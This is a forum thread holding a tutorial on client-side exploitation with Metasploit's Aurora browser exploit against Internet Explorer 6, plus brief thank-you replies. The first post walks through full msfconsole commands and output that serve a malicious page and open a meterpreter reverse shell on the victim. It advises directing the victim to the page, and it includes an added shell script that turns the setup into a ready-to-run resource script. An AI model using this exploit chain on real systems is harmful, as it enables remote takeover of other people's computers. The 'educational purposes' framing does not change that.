Client Side Exploitation Using Metasploit

Discussion in 'Ethical hacking Tips' started by lionaneesh, Aug 2, 2011.

  1. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    In this tutorial we’ll be learning how to perform a basic client side exploitation using Metasploit. Note that this tutorial is made for educational purposes only, to help you understand how exploits can be exploited.

    Client Side Attacks



    Client side attacks are special types of attacks that mainly target client side applications, e.g. web browsers, download clients, etc. They are different from server side attacks: instead of targeting vulnerabilities in server side applications like web servers, they target the client side application itself.

    For demonstrating this attack we’ll be using the Metasploit Framework and one of its basic client side exploits.

    Lab Setup



    The lab consists of a victim and an attacker machine.

    Code:
    +++++++++++++++++++                   +++++++++++++++++++++
    + Attacker        +  ================ + Victim Machine    +
    +                 +    Behind NAT     +                   +
    +++++++++++++++++++                   +++++++++++++++++++++
      
    Victim

    The victim machine is running an unpatched Windows XP SP1 with Internet Explorer 6, which is vulnerable to a client side vulnerability.

    Attacker

    The attacker’s machine is running Backtrack 5 with Metasploit installed.

    I am using virtual machines to set up my lab, and the network type is set to NAT.

    Now that we have set up our lab, let the hacking begin.

    Exploitation



    First let’s open up the Metasploit console using ‘msfconsole’:-

    Code:
      root@bt:~# msfconsole
       
                      __.                       .__.        .__. __.
        _____   _____/  |______    ____________ |  |   ____ |__|/  |_
       /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
      |  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
      |__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
            \/     \/          \/     \/ |__|
       
       
             =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
      + -- --=[ 688 exploits - 357 auxiliary - 39 post
      + -- --=[ 217 payloads - 27 encoders - 8 nops
      msf >
      
    Though Metasploit provides hundreds of exploits to exploit Internet Explorer 6, for this tutorial we’ll be using the Internet Explorer Aurora exploit.

    To use this exploit in Metasploit, simply use the ‘use’ command:-

    Code:
      msf > use exploit/windows/browser/ms10_002_aurora
       
      msf exploit(ms10_002_aurora) >
      
    Now let’s have a look at the options:-
    Code:
      msf exploit(ms10_002_aurora) > show options
       
      Module options (exploit/windows/browser/ms10_002_aurora):
       
         Name        Current Setting  Required  Description
         ----        ---------------  --------  -----------
         SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
         SRVPORT     8080             yes       The local port to listen on.
         SSL         false            no        Negotiate SSL for incoming connections
         SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
         URIPATH                      no        The URI to use for this exploit (default is random)
       
       
      Exploit target:
       
         Id  Name
         --  ----
         0   Automatic
       
      
    Now let’s set them!
    Code:
      msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1
      SRVHOST => 127.0.0.1
      msf exploit(ms10_002_aurora) > set SRVPORT 80
      SRVPORT => 80
      msf exploit(ms10_002_aurora) > set URIPATH /
      URIPATH => /
      msf exploit(ms10_002_aurora) >
      
    Above we set the server host to localhost, i.e. 127.0.0.1, the server port to 80 and the URI path to ‘/’ (root).

    Now let’s set some payload options:-
    Code:
      msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(ms10_002_aurora) > show options
       
      Module options (exploit/windows/browser/ms10_002_aurora):
       
         Name        Current Setting  Required  Description
         ----        ---------------  --------  -----------
         SRVHOST     127.0.0.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
         SRVPORT     80               yes       The local port to listen on.
         SSL         false            no        Negotiate SSL for incoming connections
         SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
         URIPATH     /                no        The URI to use for this exploit (default is random)
       
       
      Payload options (windows/meterpreter/reverse_tcp):
       
         Name      Current Setting  Required  Description
         ----      ---------------  --------  -----------
         EXITFUNC  process          yes       Exit technique: seh, thread, process, none
         LHOST                      yes       The listen address
         LPORT     4444             yes       The listen port
       
       
      Exploit target:
       
         Id  Name
         --  ----
         0   Automatic
       
       
      msf exploit(ms10_002_aurora) > set LHOST 127.0.0.1
      LHOST => 127.0.0.1
      msf exploit(ms10_002_aurora) > set LPORT 31337
      LPORT => 31337
      msf exploit(ms10_002_aurora) >
       
    Above we set the payload to reverse_tcp, the listening host to localhost and the listening port to 31337.

    Now that all is set up, let’s launch the exploit:-
    Code:
       
      msf exploit(ms10_002_aurora) > exploit
      
      Exploit running as background job.
      Started reverse handler on 127.0.0.1:31337 
      Using URL: http://127.0.0.1:80/
      Server started.
      
    The malicious web page is sitting on our server (URL: http://127.0.0.1:80/). Now all you have to do is direct the victim to this web page, and if they are running an exploitable version of Windows XP they’ll get owned!

    In this case I’ll use the vulnerable IE browser on the victim machine to view this site. Now see what happens:-

    Code:
      Sending stage (723456 bytes)
      
      Meterpreter session 1 opened (192.168.0.1:31337 -> 192.168.0.2:1514)
      
      msf exploit(ie_aurora) > sessions -i 1
      
      Starting interaction with 1...
      
      meterpreter > getuid
      Server username: WINXP\VICTIM
     
    We got a meterpreter session. Now you can use this to execute any command on the system. Thus the victim machine got owned.

    That’s all for this tutorial, stay tuned for more.
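The post above types each msfconsole command by hand and, in the transcript, points SRVHOST and LHOST at 127.0.0.1 even though the victim is a separate VM on a NAT network (the session that finally opens shows 192.168.0.1 -> 192.168.0.2). A victim on another machine can never reach the attacker's loopback address, so the browser would never load the exploit page and the reverse handler would never fire. The script below is an added example, not code from the original post or from the Metasploit project: it writes the same setup as a Metasploit resource script for `msfconsole -r`, refusing loopback or malformed addresses and out-of-range ports before anything is started. The address 192.168.0.1, the ports and the file name in the usage line are assumed lab values.

```sh
#!/bin/sh
# Added example (not from the original post): generate a Metasploit resource
# script for the ms10_002_aurora setup after sanity-checking the addresses.
# Assumes msfconsole is on PATH; 192.168.0.1 and the ports are lab placeholders.

# Return 0 if the address is loopback (127.0.0.0/8 or "localhost").
is_loopback() {
    case "$1" in
        127.*|localhost) return 0 ;;
        *) return 1 ;;
    esac
}

# Return 0 if the string is a dotted-quad IPv4 address with every octet <= 255.
is_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    oldifs=$IFS; IFS=.
    set -- $1
    IFS=$oldifs
    for o in "$@"; do
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

# Return 0 if the argument is a TCP port in 1..65535.
is_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# gen_rc <attacker-ip> <srvport> <lport> <output.rc>
# Writes the commands the tutorial types by hand into a resource script.
# Exit 1: loopback address (a remote victim cannot connect to it).
# Exit 2: malformed address or port.
gen_rc() {
    ip=$1; srvport=$2; lport=$3; out=$4
    is_ipv4 "$ip" || { echo "gen_rc: '$ip' is not an IPv4 address" >&2; return 2; }
    is_port "$srvport" && is_port "$lport" || { echo "gen_rc: bad port" >&2; return 2; }
    if is_loopback "$ip"; then
        echo "gen_rc: refusing $ip; use the attacker's lab-facing address" >&2
        return 1
    fi
    # SRVHOST is where the exploit page is served, LHOST is where meterpreter
    # connects back; on a single-homed attacker VM both are the same address.
    # Binding SRVPORT below 1024 (e.g. 80) requires running msfconsole as root.
    cat > "$out" <<EOF
use exploit/windows/browser/ms10_002_aurora
set SRVHOST $ip
set SRVPORT $srvport
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ip
set LPORT $lport
exploit -j
EOF
}

# Usage (only inside the isolated lab):
#   gen_rc 192.168.0.1 80 31337 aurora.rc && msfconsole -q -r aurora.rc
```

`exploit -j` runs the server as a background job, exactly as the `exploit` command did in the transcript, so the console stays free for `sessions -i 1` once a victim browser connects. The loopback check is the one that matters in a NAT lab: everything else in the tutorial works as shown, but with SRVHOST set to 127.0.0.1 the victim VM would have been loading its own loopback, not the attacker's page.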
     
  2. anilkamble

    anilkamble New Member

    Joined:
    Mar 12, 2011
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    employee
    Location:
    usa
    Home Page:
    http://ivpnproviders.com
    Thanks for sharing this nice info with us.
    Hoping for more from you.
     
  3. lionaneesh

    My Pleasure! :D
     
  4. ManzZup

    ManzZup New Member

    Joined:
    May 9, 2009
    Messages:
    278
    Likes Received:
    43
    Trophy Points:
    0
    Occupation:
    Production Manager:Software @ ZONTEK
    Location:
    Sri Lanka
    Home Page:
    http://zontek.zzl.org
    Really nice one,
    thanks for the share :D
     
  5. lionaneesh

    My Pleasure!
     
